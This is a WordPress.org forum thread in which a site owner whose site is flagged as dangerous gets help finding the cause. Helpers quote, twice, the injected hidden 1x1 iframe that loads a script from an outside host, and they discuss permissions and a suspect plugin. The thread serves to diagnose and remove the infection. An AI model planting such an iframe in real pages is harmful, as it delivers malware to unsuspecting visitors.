WordPress.org

Forums

Virus within wp (16 posts)

  1. Wukung
    Member
    Posted 8 years ago #

    Hi!

    Google.de has indicated my site (cjd-update.info) that it would be dangerous for visitors. Unfortunately it is quite right. A friend find out that "something" tries to activate java applications on his IE and Vista. I myself use Apple and get no warnings. I guess the evel commes from a plugin. But how can I find out from witch one? For the time beeing the site is but in the maintenance mode. A help would be great.

    Thank you

  2. whooami
    Member
    Posted 8 years ago #

    you look at the files ..

    your site isnt even cached in google, so i cant even look at the cached site, and you just said its in maintenence mode.

    what else can you do?

  3. whooami
    Member
    Posted 8 years ago #

    http://web.archive.org/web/20070517185830/http://www.onlzoberurff.info/

    you have a script running that picking up ips and operating systems. depending on what sort of javascript is being used, that may very well be what's causing it.

    nobody really needs to know that anyway, do they? I already know what my ip and os is -- i dont need you tell me.

  4. Wukung
    Member
    Posted 8 years ago #

    sorry, NOW the site is available: http://cjd-update.info

    Here the entry at google.de:

    http://www.google.de/search?q=cjd-update&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:de:official&client=firefox-a

    I search for an idea how to find out the evil source...

  5. whooami
    Member
    Posted 8 years ago #

    I saw the entry on google.com, thanks. In english. Had I not, I wouldnt have been able to tell you that google isnt caching your site.

    SOMETHING on your site is contacting or attempting to contact localhost -- which for your readers is THEIR box. I brought up your site from a shell using lynx and saw it quite clearly.

  6. whooami
    Member
    Posted 8 years ago #

    near the bottom:

    <iframe src="http://www.nanoy.org/se.php?id=191" width=1 height=1></iframe>

    theres your problem. actually, thats not the problem, but its your symptom.

    your site has been compromised. check your permissions:

    directories: 755
    files: 644

    leaving wp-content and the theme directories open for editing is a security risk.

  7. Wukung
    Member
    Posted 8 years ago #

    Now I have changed the only one file I know where "Localhost" is a matter. I deleted define('ENABLE_CACHE', true); from the wp-config.php. Have you an idea what that SOMETHING could be?

    Thank you!!

  8. whooami
    Member
    Posted 8 years ago #

    my last reply was caught by the forum as spam -

    near the bottom:

    <iframe src="http://www.nanoy.org/se.php?id=191" width=1 height=1></iframe>

    theres your problem. actually, thats not the problem, but its your symptom.

    your site has been compromised. check your permissions:

    directories: 755
    files: 644

    leaving wp-content and the theme directories open for editing is a security risk.

  9. Wukung
    Member
    Posted 8 years ago #

    It seems the plugin SHARE THIS was the foul source. Could you please be so kind and check with your shell? THANKS

  10. Chris_K
    Member
    Posted 8 years ago #

    see Whooami's last 2 replies (they were caught in moderation, I just released them)

  11. whooami
    Member
    Posted 8 years ago #

    i looked - it might have been inside that plugin .. dunno I really doubt that alex king is letting people download plugins with exploits in the code. Isnt that his plugin?

  12. drmiketemp
    Member
    Posted 8 years ago #

    I just downloaded the Share This plugin from Alex's site and don't see any iframe in there.

  13. whooami
    Member
    Posted 8 years ago #

    yeah i looked too, didnt see it ..in this guys page source, the iframe was immediately before the closing body tag and after the last <!-- Share This END -->

  14. Wukung
    Member
    Posted 8 years ago #

    I checked the permissions. But they are ok (755). Nevertheless, thank you for the idea. It seems to be settled...

  15. IcelandDream
    Member
    Posted 8 years ago #

    You have a mystery iframe just below:
    "Der Weg nach Oberurff"
    and above "Links".
    Something in that map thing. I used wget to grab the source and there it is. Using linx I too saw that reference to localhost.

  16. Wukung
    Member
    Posted 8 years ago #

    Thank you very much. I will delete that link at once. Besides your hint I was already thinking that could be the troublemaker. THANKS!

Topic Closed

This topic has been closed to new replies.

About this Topic